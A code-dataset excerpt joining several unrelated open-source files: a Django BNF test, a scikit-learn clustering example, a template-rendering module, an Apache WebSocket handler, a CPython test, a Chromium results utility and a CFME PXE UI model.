from mock import patch
@patch('frontend.management.commands.generate_presentation_replacements'
'.cleanup_empty_classes')
@patch('frontend.management.commands.generate_presentation_replacements'
'.create_bigquery_table')
@patch('pipeline.management.commands.create_normalised_prescribing_view'
'.Command.handle')
class CommandsTestCase(TestCase):
def setUp(self):
Section.objects.create(bnf_id='0000',
name='Subsection 0.0',
bnf_chapter=0,
bnf_section=0,
bnf_para=0)
Section.objects.create(bnf_id='9999',
name='Subsection 9.9',
bnf_chapter=0,
bnf_section=0,
bnf_para=0)
Section.objects.create(bnf_id='777777',
name='Para 7.7.7',
bnf_chapter=0,
bnf_section=0,
bnf_para=0)
Section.objects.create(bnf_id='222222',
name='Para 2.2.2',
bnf_chapter=0,
bnf_section=0,
bnf_para=0)
Chemical.objects.create(bnf_code='ZZZZZZZZZ',
chem_name='Chemical Z')
Chemical.objects.create(bnf_code='YYYYYYYYY',
chem_name='Chemical Y')
Chemical.objects.create(bnf_code='111111111',
chem_name='Chemical 1')
Product.objects.create(bnf_code='33333333333',
name='Product 3')
Product.objects.create(bnf_code='44444444444',
name='Product 4')
Presentation.objects.create(bnf_code='MMMMMMMMMMMMMMM',
name='Drug M')
Presentation.objects.create(bnf_code='999999999999999',
name='Drug 9')
Presentation.objects.create(bnf_code='ZZZZZZZZZZZZZZZ',
name='Drug Z')
fixtures_dir = 'frontend/tests/fixtures/commands/'
self.args = [
fixtures_dir + 'presentation_replacements_2017.txt',
fixtures_dir + 'presentation_replacements_2016.txt']
self.opts = {}
def test_replacements(
self,
mock_cleanup_empty_classes,
mock_create_bigquery_table,
mock_handle):
# Simple replacement
call_command(
'generate_presentation_replacements', *self.args, **self.opts)
p = Presentation.objects.get(bnf_code='YYYYYYYYYYYYYYY')
self.assertEqual(p.replaced_by.bnf_code, 'ZZZZZZZZZZZZZZZ')
self.assertEqual(p.current_version.bnf_code, 'ZZZZZZZZZZZZZZZ')
# Double replacement including section change
p = Presentation.objects.get(bnf_code='777777777777777')
self.assertEqual(p.current_version.bnf_code, '999999999999999')
# Deal with loops
p = Presentation.objects.get(bnf_code='MMMMMMMMMMMMMMM')
self.assertEqual(p.current_version.bnf_code, 'MMMMMMMMMMMMMMM')
def test_chemical_currency(
self,
mock_cleanup_empty_classes,
mock_create_bigquery_table,
mock_handle):
call_command(
'generate_presentation_replacements', *self.args, **self.opts)
self.assertEqual(
Chemical.objects.get(pk='YYYYYYYYY').is_current, False)
self.assertEqual(
Chemical.objects.get(pk='ZZZZZZZZZ').is_current, True)
self.assertEqual(
Chemical.objects.get(pk='111111111').is_current, True)
# Subsection
self.assertEqual(
Section.objects.get(pk='0000').is_current, False)
self.assertEqual(
Section.objects.get(pk='9999').is_current, True)
# Paragraph
self.assertEqual(
Section.objects.get(pk='777777').is_current, False)
self.assertEqual(
Section.objects.get(pk='222222').is_current, True)
# Products
self.assertEqual(
Product.objects.get(pk='44444444444').is_current, False)
self.assertEqual(
Product.objects.get(pk='33333333333').is_current, True)
| mit |
hsuantien/scikit-learn | examples/cluster/plot_agglomerative_clustering_metrics.py | 402 | 4492 | """
Agglomerative clustering with different metrics
===============================================
Demonstrates the effect of different metrics on the hierarchical clustering.
The example is engineered to show the effect of the choice of different
metrics. It is applied to waveforms, which can be seen as
high-dimensional vector. Indeed, the difference between metrics is
usually more pronounced in high dimension (in particular for euclidean
and cityblock).
We generate data from three groups of waveforms. Two of the waveforms
(waveform 1 and waveform 2) are proportional one to the other. The cosine
distance is invariant to a scaling of the data, as a result, it cannot
distinguish these two waveforms. Thus even with no noise, clustering
using this distance will not separate out waveform 1 and 2.
We add observation noise to these waveforms. We generate very sparse
noise: only 6% of the time points contain noise. As a result, the
l1 norm of this noise (ie "cityblock" distance) is much smaller than it's
l2 norm ("euclidean" distance). This can be seen on the inter-class
distance matrices: the values on the diagonal, that characterize the
spread of the class, are much bigger for the Euclidean distance than for
the cityblock distance.
When we apply clustering to the data, we find that the clustering
reflects what was in the distance matrices. Indeed, for the Euclidean
distance, the classes are ill-separated because of the noise, and thus
the clustering does not separate the waveforms. For the cityblock
distance, the separation is good and the waveform classes are recovered.
Finally, the cosine distance does not separate at all waveform 1 and 2,
thus the clustering puts them in the same cluster.
"""
# Author: Gael Varoquaux
# License: BSD 3-Clause or CC-0
import matplotlib.pyplot as plt
import numpy as np
from sklearn.cluster import AgglomerativeClustering
from sklearn.metrics import pairwise_distances
np.random.seed(0)
# Generate waveform data
n_features = 2000
t = np.pi * np.linspace(0, 1, n_features)
def sqr(x):
return np.sign(np.cos(x))
X = list()
y = list()
for i, (phi, a) in enumerate([(.5, .15), (.5, .6), (.3, .2)]):
for _ in range(30):
phase_noise = .01 * np.random.normal()
amplitude_noise = .04 * np.random.normal()
additional_noise = 1 - 2 * np.random.rand(n_features)
# Make the noise sparse
additional_noise[np.abs(additional_noise) < .997] = 0
X.append(12 * ((a + amplitude_noise)
* (sqr(6 * (t + phi + phase_noise)))
+ additional_noise))
y.append(i)
X = np.array(X)
y = np.array(y)
n_clusters = 3
labels = ('Waveform 1', 'Waveform 2', 'Waveform 3')
# Plot the ground-truth labelling
plt.figure()
plt.axes([0, 0, 1, 1])
for l, c, n in zip(range(n_clusters), 'rgb',
labels):
lines = plt.plot(X[y == l].T, c=c, alpha=.5)
lines[0].set_label(n)
plt.legend(loc='best')
plt.axis('tight')
plt.axis('off')
plt.suptitle("Ground truth", size=20)
# Plot the distances
for index, metric in enumerate(["cosine", "euclidean", "cityblock"]):
avg_dist = np.zeros((n_clusters, n_clusters))
plt.figure(figsize=(5, 4.5))
for i in range(n_clusters):
for j in range(n_clusters):
avg_dist[i, j] = pairwise_distances(X[y == i], X[y == j],
metric=metric).mean()
avg_dist /= avg_dist.max()
for i in range(n_clusters):
for j in range(n_clusters):
plt.text(i, j, '%5.3f' % avg_dist[i, j],
verticalalignment='center',
horizontalalignment='center')
plt.imshow(avg_dist, interpolation='nearest', cmap=plt.cm.gnuplot2,
vmin=0)
plt.xticks(range(n_clusters), labels, rotation=45)
plt.yticks(range(n_clusters), labels)
plt.colorbar()
plt.suptitle("Interclass %s distances" % metric, size=18)
plt.tight_layout()
# Plot clustering results
for index, metric in enumerate(["cosine", "euclidean", "cityblock"]):
model = AgglomerativeClustering(n_clusters=n_clusters,
linkage="average", affinity=metric)
model.fit(X)
plt.figure()
plt.axes([0, 0, 1, 1])
for l, c in zip(np.arange(model.n_clusters), 'rgbk'):
plt.plot(X[model.labels_ == l].T, c=c, alpha=.5)
plt.axis('tight')
plt.axis('off')
plt.suptitle("AgglomerativeClustering(affinity=%s)" % metric, size=20)
plt.show()
| bsd-3-clause |
JoshAshby/seshat_addons | seshat_addons/view/template.py | 1 | 9852 | #!/usr/bin/env python
"""
TEMPLATE ALL THE THINGS WITH Jinja (And Mustache)!!!!
Uses the Jinja templating language to make a base template object by which is
easy to work with in the controllers, and a walker and templateFile objects
which provide automatic reading and rereading in debug mode of template files.
For more information, see: https://github.com/JoshAshby/
http://xkcd.com/353/
Josh Ashby
2014
http://joshashby.com
joshuaashby@joshashby.com
"""
import pystache
import logging
import codecs
import jinja2
import arrow
import copy
import yaml
import os
import re
logger = logging.getLogger("seshat.views")
dynamic_reloading = False
templates_base = "views/"
time_format = "dd MMM DD HH:mm:ss:SS YYYY"
config_delim = "+++"
default_theme_color = "green"
partial_syntax_regex = r'(\!\[{2}(?:.*?)\]{2})'
tmpls = {}
partial_re = re.compile(partial_syntax_regex)
partials_ready = False
class templateFile(object):
def __init__(self, fileBit):
"""
Reads in fileBit into memory, and sets the modified time for the
object to that of the file at the current moment.
"""
self._file_bit = fileBit
self._file = ''.join([templates_base, fileBit])
self._mtime = 0
self._config = {}
self._read_template()
def _read_template(self):
"""
Read in the template only if it has been modified since we first
read it into our `_template`
"""
mtime = os.path.getmtime(self._file)
nt = arrow.get(mtime).format(time_format)
logger.debug("""\n\r============== Template =================
Reading template into memory...
TEMPLATE: %s
TYPE: %s
MTIME: %s
""" % (self._file, self.extension, nt))
with codecs.open(self._file, "r", "utf-8") as openTmpl:
raw = unicode(openTmpl.read())
self._mtime = mtime
self._parse_raw(raw)
def _parse_raw(self, raw):
if raw[:3] == config_delim:
config, template = raw.split(config_delim, 2)[1:]
self._config = yaml.load(config)
else:
self._config = {}
template = raw
self._raw_template = template
def _raw_to_engine(self, raw):
if(self.is_mustache):
self._engine_template = raw
if(self.is_jinja):
self._engine_template = jinja2.Template(raw)
def _parse_partials(self):
updated = False
partials = []
matches = partial_re.findall(self._raw_template)
if matches:
for match in matches:
name = match[:len(match)-2][3:]
partials.append(match)
updated = updated or tmpls[name]._update_template()
return updated, partials
def _replace_partials(self, partials):
pre_engine = copy.copy(self._raw_template)
try:
for match in partials:
name = match[:len(match)-2][3:]
if self.extension != tmpls[name].extension:
raise Exception("Can't mix template types in partials!")
logger.debug("""============= Partial =============
REPLACING: {}
PARENT TEMPLATE:{}""".format(match, self._file))
pattern = "({})".format(re.escape(match))
pattern_regex = re.compile(pattern)
pre_engine = re.sub(pattern_regex, tmpls[name].template, pre_engine)
self._raw_to_engine(pre_engine)
except KeyError:
raise KeyError("Couldn't find the template {}, as a partial of {}".format(name, self._file_bit))
def _update_template(self):
updated = False
mtime = os.path.getmtime(self._file)
if self._mtime < mtime:
pt = arrow.get(self._mtime).format(time_format)
nt = arrow.get(mtime).format(time_format)
logger.debug("""\n\r============== Template =================
Updating template...
TEMPLATE: %s
TYPE: %s
OLD MTIME: %s
NEW MTIME: %s
""" % (self._file, self.extension, pt, nt))
self._read_template()
updated = True
update, partials = self._parse_partials()
if update or updated:
self._replace_partials(partials)
updated = True
return updated
@property
def template(self):
if dynamic_reloading:
self._update_template()
return self._raw_template
@property
def config(self):
return self._config
@property
def extension(self):
return self._file.rsplit(".", 1)[1]
@property
def is_jinja(self):
return self.extension=="jinja"
@property
def is_mustache(self):
return self.extension=="mustache"
def render(self, data):
if dynamic_reloading:
self._update_template()
_data = copy.deepcopy(self._config)
_data.update(data)
if(self.is_jinja):
wat = unicode(self._engine_template.render(_data))
else:
result = pystache.render(self._engine_template, _data)
wat = unicode(result)
del _data
return wat
def __contains__(self, item):
return item in self._config
def __getitem__(self, item):
return self._config[item]
def __setitem__(self, item, value):
self._config[item] = value
class template(object):
def __init__(self, template, request=None, additional_data=None):
self._baseData = {
"title": "",
"stylesheets": [],
"scripts": "",
"scriptFiles": [],
"breadcrumbs": False,
"breadcrumbs_top": False,
}
if additional_data:
self._baseData.update(additional_data)
if request:
self._baseData["req"] = request
self._template = template
self._base = "skeletons/navbar"
@property
def template(self):
return self._template
@template.setter
def template(self, value):
assert type(value) is str
self._template = value
@property
def skeleton(self):
return self._base
@skeleton.setter
def skeleton(self, value):
assert type(value) == str
self._base = value
@skeleton.deleter
def skeleton(self):
self._base = ""
@property
def data(self):
return self._baseData
@data.setter
def data(self, value):
assert type(value) == dict
self._baseData.update(value)
@property
def title(self):
return self._baseData["title"]
@title.setter
def title(self, value):
self._baseData.update({"title": value})
def append(self, value):
self.data = value
def update(self, value):
self.data = value
@property
def scripts(self):
return self._baseData["scriptFiles"], self._baseData["scripts"]
@scripts.setter
def scripts(self, value):
if type(value) == list:
self._baseData["scriptFiles"].extend(value)
else:
self._baseData["scripts"] += value
@property
def stylesheets(self):
return self._baseData["stylesheets"], self._baseData["styles"]
@stylesheets.setter
def stylesheets(self, value):
if type(value) == list:
self._baseData["stylesheets"].extend(value)
else:
self._baseData["styles"] += value
@stylesheets.deleter
def stylesheets(self):
self._baseData["stylesheets"] = []
def partial(self, placeholder, template, data=None):
try:
if data is None: data = {}
assert type(data) is dict
data.update(self._baseData.copy())
self._baseData[placeholder] = tmpls[template].render(data)
except KeyError:
raise KeyError("Couldn't find the template {} when used as a partial".format(template))
def render(self):
data = self._baseData.copy()
template = tmpls[self._template]
body = template.render(data)
data.update(template.config)
if "base" in template:
base = template["base"]
else:
base = self._base
if not "theme_color" in template and not "theme_color" in data:
data["theme_color"] = default_theme_color
if base is not None and base:
baseTmpl= tmpls[base]
data["body"] = body
_render = baseTmpl.render(data)
else:
_render = body
del data
del self._baseData
return unicode(_render)
class PartialTemplate(template):
def render(self):
data = self._baseData.copy()
template = tmpls[self._template]
body = template.render(data)
body = body if body else ""
del data
return unicode(body)
def read_in_templates():
global partials_ready
global tmpls
# Parse all template files into a template object
for top, folders, files in os.walk(templates_base):
for fi in files:
base = top.split(templates_base)[1]
file_name, extension = fi.rsplit('.', 1)
if extension in ["mustache", "jinja"]:
name = '/'.join([base, file_name]).lstrip('/')
fi = '/'.join([base, fi])
tmpls[name] = templateFile(fi)
partials_ready = True
logger.debug("Parsing templates for partials and performing replacements.")
# Parse all partials within the templates, replacing the partial text with the
# given partial, so that we have support for partials in both mustache and
# jinja with the same syntax (which is currently ![[name/of/partial]])
for key, tmpl in tmpls.iteritems():
updated, partials = tmpl._parse_partials()
tmpl._replace_partials(partials)
| gpl-3.0 |
edunham/servo | tests/wpt/web-platform-tests/tools/pywebsocket/src/mod_pywebsocket/headerparserhandler.py | 638 | 9836 | # Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""PythonHeaderParserHandler for mod_pywebsocket.
Apache HTTP Server and mod_python must be configured such that this
function is called to handle WebSocket request.
"""
import logging
from mod_python import apache
from mod_pywebsocket import common
from mod_pywebsocket import dispatch
from mod_pywebsocket import handshake
from mod_pywebsocket import util
# PythonOption to specify the handler root directory.
_PYOPT_HANDLER_ROOT = 'mod_pywebsocket.handler_root'
# PythonOption to specify the handler scan directory.
# This must be a directory under the root directory.
# The default is the root directory.
_PYOPT_HANDLER_SCAN = 'mod_pywebsocket.handler_scan'
# PythonOption to allow handlers whose canonical path is
# not under the root directory. It's disallowed by default.
# Set this option with value of 'yes' to allow.
_PYOPT_ALLOW_HANDLERS_OUTSIDE_ROOT = (
'mod_pywebsocket.allow_handlers_outside_root_dir')
# Map from values to their meanings. 'Yes' and 'No' are allowed just for
# compatibility.
_PYOPT_ALLOW_HANDLERS_OUTSIDE_ROOT_DEFINITION = {
'off': False, 'no': False, 'on': True, 'yes': True}
# (Obsolete option. Ignored.)
# PythonOption to specify to allow handshake defined in Hixie 75 version
# protocol. The default is None (Off)
_PYOPT_ALLOW_DRAFT75 = 'mod_pywebsocket.allow_draft75'
# Map from values to their meanings.
_PYOPT_ALLOW_DRAFT75_DEFINITION = {'off': False, 'on': True}
class ApacheLogHandler(logging.Handler):
"""Wrapper logging.Handler to emit log message to apache's error.log."""
_LEVELS = {
logging.DEBUG: apache.APLOG_DEBUG,
logging.INFO: apache.APLOG_INFO,
logging.WARNING: apache.APLOG_WARNING,
logging.ERROR: apache.APLOG_ERR,
logging.CRITICAL: apache.APLOG_CRIT,
}
def __init__(self, request=None):
logging.Handler.__init__(self)
self._log_error = apache.log_error
if request is not None:
self._log_error = request.log_error
# Time and level will be printed by Apache.
self._formatter = logging.Formatter('%(name)s: %(message)s')
def emit(self, record):
apache_level = apache.APLOG_DEBUG
if record.levelno in ApacheLogHandler._LEVELS:
apache_level = ApacheLogHandler._LEVELS[record.levelno]
msg = self._formatter.format(record)
# "server" parameter must be passed to have "level" parameter work.
# If only "level" parameter is passed, nothing shows up on Apache's
# log. However, at this point, we cannot get the server object of the
# virtual host which will process WebSocket requests. The only server
# object we can get here is apache.main_server. But Wherever (server
# configuration context or virtual host context) we put
# PythonHeaderParserHandler directive, apache.main_server just points
# the main server instance (not any of virtual server instance). Then,
# Apache follows LogLevel directive in the server configuration context
# to filter logs. So, we need to specify LogLevel in the server
# configuration context. Even if we specify "LogLevel debug" in the
# virtual host context which actually handles WebSocket connections,
# DEBUG level logs never show up unless "LogLevel debug" is specified
# in the server configuration context.
#
# TODO(tyoshino): Provide logging methods on request object. When
# request is mp_request object (when used together with Apache), the
# methods call request.log_error indirectly. When request is
# _StandaloneRequest, the methods call Python's logging facility which
# we create in standalone.py.
self._log_error(msg, apache_level, apache.main_server)
def _configure_logging():
logger = logging.getLogger()
# Logs are filtered by Apache based on LogLevel directive in Apache
# configuration file. We must just pass logs for all levels to
# ApacheLogHandler.
logger.setLevel(logging.DEBUG)
logger.addHandler(ApacheLogHandler())
_configure_logging()
_LOGGER = logging.getLogger(__name__)
def _parse_option(name, value, definition):
if value is None:
return False
meaning = definition.get(value.lower())
if meaning is None:
raise Exception('Invalid value for PythonOption %s: %r' %
(name, value))
return meaning
def _create_dispatcher():
_LOGGER.info('Initializing Dispatcher')
options = apache.main_server.get_options()
handler_root = options.get(_PYOPT_HANDLER_ROOT, None)
if not handler_root:
raise Exception('PythonOption %s is not defined' % _PYOPT_HANDLER_ROOT,
apache.APLOG_ERR)
handler_scan = options.get(_PYOPT_HANDLER_SCAN, handler_root)
allow_handlers_outside_root = _parse_option(
_PYOPT_ALLOW_HANDLERS_OUTSIDE_ROOT,
options.get(_PYOPT_ALLOW_HANDLERS_OUTSIDE_ROOT),
_PYOPT_ALLOW_HANDLERS_OUTSIDE_ROOT_DEFINITION)
dispatcher = dispatch.Dispatcher(
handler_root, handler_scan, allow_handlers_outside_root)
for warning in dispatcher.source_warnings():
apache.log_error(
'mod_pywebsocket: Warning in source loading: %s' % warning,
apache.APLOG_WARNING)
return dispatcher
# Initialize
_dispatcher = _create_dispatcher()
def headerparserhandler(request):
"""Handle request.
Args:
request: mod_python request.
This function is named headerparserhandler because it is the default
name for a PythonHeaderParserHandler.
"""
handshake_is_done = False
try:
# Fallback to default http handler for request paths for which
# we don't have request handlers.
if not _dispatcher.get_handler_suite(request.uri):
request.log_error(
'mod_pywebsocket: No handler for resource: %r' % request.uri,
apache.APLOG_INFO)
request.log_error(
'mod_pywebsocket: Fallback to Apache', apache.APLOG_INFO)
return apache.DECLINED
except dispatch.DispatchException, e:
request.log_error(
'mod_pywebsocket: Dispatch failed for error: %s' % e,
apache.APLOG_INFO)
if not handshake_is_done:
return e.status
try:
allow_draft75 = _parse_option(
_PYOPT_ALLOW_DRAFT75,
apache.main_server.get_options().get(_PYOPT_ALLOW_DRAFT75),
_PYOPT_ALLOW_DRAFT75_DEFINITION)
try:
handshake.do_handshake(
request, _dispatcher, allowDraft75=allow_draft75)
except handshake.VersionException, e:
request.log_error(
'mod_pywebsocket: Handshake failed for version error: %s' % e,
apache.APLOG_INFO)
request.err_headers_out.add(common.SEC_WEBSOCKET_VERSION_HEADER,
e.supported_versions)
return apache.HTTP_BAD_REQUEST
except handshake.HandshakeException, e:
# Handshake for ws/wss failed.
# Send http response with error status.
request.log_error(
'mod_pywebsocket: Handshake failed for error: %s' % e,
apache.APLOG_INFO)
return e.status
handshake_is_done = True
request._dispatcher = _dispatcher
_dispatcher.transfer_data(request)
except handshake.AbortedByUserException, e:
request.log_error('mod_pywebsocket: Aborted: %s' % e, apache.APLOG_INFO)
except Exception, e:
# DispatchException can also be thrown if something is wrong in
# pywebsocket code. It's caught here, then.
request.log_error('mod_pywebsocket: Exception occurred: %s\n%s' %
(e, util.get_stack_trace()),
apache.APLOG_ERR)
# Unknown exceptions before handshake mean Apache must handle its
# request with another handler.
if not handshake_is_done:
return apache.DECLINED
# Set assbackwards to suppress response header generation by Apache.
request.assbackwards = 1
return apache.DONE # Return DONE such that no other handlers are invoked.
# vi:sts=4 sw=4 et
| mpl-2.0 |
mancoast/CPythonPyc_test | fail/324_test_structseq.py | 57 | 4010 | import os
import time
import unittest
from test import support
class StructSeqTest(unittest.TestCase):
def test_tuple(self):
t = time.gmtime()
self.assertIsInstance(t, tuple)
astuple = tuple(t)
self.assertEqual(len(t), len(astuple))
self.assertEqual(t, astuple)
# Check that slicing works the same way; at one point, slicing t[i:j] with
# 0 < i < j could produce NULLs in the result.
for i in range(-len(t), len(t)):
self.assertEqual(t[i:], astuple[i:])
for j in range(-len(t), len(t)):
self.assertEqual(t[i:j], astuple[i:j])
for j in range(-len(t), len(t)):
self.assertEqual(t[:j], astuple[:j])
self.assertRaises(IndexError, t.__getitem__, -len(t)-1)
self.assertRaises(IndexError, t.__getitem__, len(t))
for i in range(-len(t), len(t)-1):
self.assertEqual(t[i], astuple[i])
def test_repr(self):
t = time.gmtime()
self.assertTrue(repr(t))
t = time.gmtime(0)
self.assertEqual(repr(t),
"time.struct_time(tm_year=1970, tm_mon=1, tm_mday=1, tm_hour=0, "
"tm_min=0, tm_sec=0, tm_wday=3, tm_yday=1, tm_isdst=0)")
# os.stat() gives a complicated struct sequence.
st = os.stat(__file__)
rep = repr(st)
self.assertTrue(rep.startswith(os.name + ".stat_result"))
self.assertIn("st_mode=", rep)
self.assertIn("st_ino=", rep)
self.assertIn("st_dev=", rep)
def test_concat(self):
t1 = time.gmtime()
t2 = t1 + tuple(t1)
for i in range(len(t1)):
self.assertEqual(t2[i], t2[i+len(t1)])
def test_repeat(self):
t1 = time.gmtime()
t2 = 3 * t1
for i in range(len(t1)):
self.assertEqual(t2[i], t2[i+len(t1)])
self.assertEqual(t2[i], t2[i+2*len(t1)])
def test_contains(self):
t1 = time.gmtime()
for item in t1:
self.assertIn(item, t1)
self.assertNotIn(-42, t1)
def test_hash(self):
t1 = time.gmtime()
self.assertEqual(hash(t1), hash(tuple(t1)))
def test_cmp(self):
t1 = time.gmtime()
t2 = type(t1)(t1)
self.assertEqual(t1, t2)
self.assertTrue(not (t1 < t2))
self.assertTrue(t1 <= t2)
self.assertTrue(not (t1 > t2))
self.assertTrue(t1 >= t2)
self.assertTrue(not (t1 != t2))
def test_fields(self):
t = time.gmtime()
self.assertEqual(len(t), t.n_fields)
self.assertEqual(t.n_fields, t.n_sequence_fields+t.n_unnamed_fields)
def test_constructor(self):
t = time.struct_time
self.assertRaises(TypeError, t)
self.assertRaises(TypeError, t, None)
self.assertRaises(TypeError, t, "123")
self.assertRaises(TypeError, t, "123", dict={})
self.assertRaises(TypeError, t, "123456789", dict=None)
s = "123456789"
self.assertEqual("".join(t(s)), s)
def test_eviltuple(self):
class Exc(Exception):
pass
# Devious code could crash structseqs' contructors
class C:
def __getitem__(self, i):
raise Exc
def __len__(self):
return 9
self.assertRaises(Exc, time.struct_time, C())
def test_reduce(self):
t = time.gmtime()
x = t.__reduce__()
def test_extended_getslice(self):
# Test extended slicing by comparing with list slicing.
t = time.gmtime()
L = list(t)
indices = (0, None, 1, 3, 19, 300, -1, -2, -31, -300)
for start in indices:
for stop in indices:
# Skip step 0 (invalid)
for step in indices[1:]:
self.assertEqual(list(t[start:stop:step]),
L[start:stop:step])
def test_main():
support.run_unittest(StructSeqTest)
if __name__ == "__main__":
test_main()
| gpl-3.0 |
chromium/chromium | tools/perf/core/results_processor/util.py | 5 | 5278 | # Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import calendar
import datetime
import json
import logging
import os
import requests # pylint: disable=import-error
import multiprocessing
from multiprocessing.dummy import Pool as ThreadPool
import sys
TELEMETRY_TEST_PATH_FORMAT = 'telemetry'
GTEST_TEST_PATH_FORMAT = 'gtest'
def ApplyInParallel(function, work_list, on_failure=None):
"""Apply a function to all values in work_list in parallel.
Args:
function: A function with one argument.
work_list: Any iterable with arguments for the function.
on_failure: A function to run in case of a failure.
"""
if not work_list:
return
try:
# Note that this is speculatively halved as an attempt to fix
# crbug.com/953365.
cpu_count = multiprocessing.cpu_count() // 2
if sys.platform == 'win32':
# TODO(crbug.com/1190269) - we can't use more than 56
# cores on Windows or Python3 may hang.
cpu_count = min(cpu_count, 56)
except NotImplementedError:
# Some platforms can raise a NotImplementedError from cpu_count()
logging.warning('cpu_count() not implemented.')
cpu_count = 4
pool = ThreadPool(min(cpu_count, len(work_list)))
def function_with_try(arg):
try:
function(arg)
except Exception: # pylint: disable=broad-except
# logging exception here is the only way to get a stack trace since
# multiprocessing's pool implementation does not save that data. See
# crbug.com/953365.
logging.exception('Exception while running %s' % function.__name__)
if on_failure:
on_failure(arg)
try:
pool.imap_unordered(function_with_try, work_list)
pool.close()
pool.join()
finally:
pool.terminate()
def SplitTestPath(test_result, test_path_format):
""" Split a test path into test suite name and test case name.
Telemetry and Gtest have slightly different test path formats.
Telemetry uses '{benchmark_name}/{story_name}', e.g.
'system_health.common_desktop/load:news:cnn:2020'.
Gtest uses '{test_suite_name}.{test_case_name}', e.g.
'ZeroToFiveSequence/LuciTestResultParameterizedTest.Variant'
"""
if test_path_format == TELEMETRY_TEST_PATH_FORMAT:
separator = '/'
elif test_path_format == GTEST_TEST_PATH_FORMAT:
separator = '.'
else:
raise ValueError('Unknown test path format: %s' % test_path_format)
test_path = test_result['testPath']
if separator not in test_path:
raise ValueError('Invalid test path: %s' % test_path)
return test_path.split(separator, 1)
def IsoTimestampToEpoch(timestamp):
"""Convert ISO formatted time to seconds since epoch."""
try:
dt = datetime.datetime.strptime(timestamp, '%Y-%m-%dT%H:%M:%S.%fZ')
except ValueError:
dt = datetime.datetime.strptime(timestamp, '%Y-%m-%dT%H:%M:%SZ')
return calendar.timegm(dt.timetuple()) + dt.microsecond / 1e6
def SetUnexpectedFailure(test_result):
"""Update fields of a test result in a case of processing failure."""
test_result['status'] = 'FAIL'
test_result['expected'] = False
logging.error('Processing failed for test %s', test_result['testPath'])
def TryUploadingResultToResultSink(results):
def buildSummaryHtml(artifacts):
# Using test log as the summary. It is stored in an artifact named logs.txt.
if artifacts.has_key('logs.txt'):
summary_html = '<p><text-artifact artifact-id="logs.txt"></p>'
else:
summary_html = ''
return summary_html
def buildArtifacts(artifacts):
artifacts_result = {}
for artifact_id, artifact in artifacts.items():
artifacts_result[artifact_id] = {'filePath': artifact['filePath']}
return artifacts_result
def parse(results):
test_results = []
for test_case in results:
test_result = {
'testId': test_case['testPath'],
'expected': test_case['expected'],
'status': test_case['status']
}
# TODO: go/result-sink#test-result-json-object listed that specifying
# testMetadata with location info can helped with breaking down flaky
# tests. We don't have the file location currently in test results.
if 'runDuration' in test_case:
test_result['duration'] = '%.9fs' % float(
test_case['runDuration'].rstrip('s'))
if 'tags' in test_case:
test_result['tags'] = test_case['tags']
if 'outputArtifacts' in test_case:
test_result['summaryHtml'] = buildSummaryHtml(
test_case['outputArtifacts'])
test_result['artifacts'] = buildArtifacts(test_case['outputArtifacts'])
test_results.append(test_result)
return test_results
try:
with open(os.environ['LUCI_CONTEXT']) as f:
sink = json.load(f)['result_sink']
except KeyError:
return
test_results = parse(results)
res = requests.post(
url='http://%s/prpc/luci.resultsink.v1.Sink/ReportTestResults' %
sink['address'],
headers={
'Content-Type': 'application/json',
'Accept': 'application/json',
'Authorization': 'ResultSink %s' % sink['auth_token'],
},
data=json.dumps({'testResults': test_results}))
res.raise_for_status()
| bsd-3-clause |
psav/cfme_tests | cfme/infrastructure/pxe.py | 5 | 36894 | # -*- coding: utf-8 -*-
""" A model of a PXE Server in CFME
"""
import attr
from navmazing import NavigateToSibling, NavigateToAttribute
from selenium.common.exceptions import NoSuchElementException
from widgetastic.widget import View, Text, Checkbox
from widgetastic_patternfly import Dropdown, Accordion, BootstrapSelect, Button
from cfme.base import BaseEntity, BaseCollection
from cfme.base.login import BaseLoggedInPage
from cfme.utils import conf, ParamClassName
from cfme.utils.appliance import Navigatable
from cfme.utils.appliance.implementations.ui import navigator, CFMENavigateStep, navigate_to
from cfme.utils.datafile import load_data_file
from cfme.utils.path import project_path
from cfme.utils.pretty import Pretty
from cfme.utils.update import Updateable
from cfme.utils.varmeth import variable
from cfme.utils.wait import wait_for
from widgetastic_manageiq import (ManageIQTree, Input, ScriptBox, SummaryTable, Table, Version,
VersionPick)
class PXEToolBar(View):
"""
represents PXE toolbar and its controls
"""
# todo: add back button later
configuration = Dropdown(text='Configuration')
class PXESideBar(View):
"""
represents left side bar. it usually contains navigation, filters, etc
"""
@View.nested
class servers(Accordion): # noqa
ACCORDION_NAME = "PXE Servers"
tree = ManageIQTree()
@View.nested
class templates(Accordion): # noqa
ACCORDION_NAME = "Customization Templates"
tree = ManageIQTree()
@View.nested
class image_types(Accordion): # noqa
ACCORDION_NAME = "System Image Types"
tree = ManageIQTree()
@View.nested
class datastores(Accordion): # noqa
ACCORDION_NAME = "ISO Datastores"
tree = ManageIQTree()
class PXEMainView(BaseLoggedInPage):
"""
represents whole All PXE Servers page
"""
toolbar = View.nested(PXEToolBar)
sidebar = View.nested(PXESideBar)
title = Text('//div[@id="main-content"]//h1')
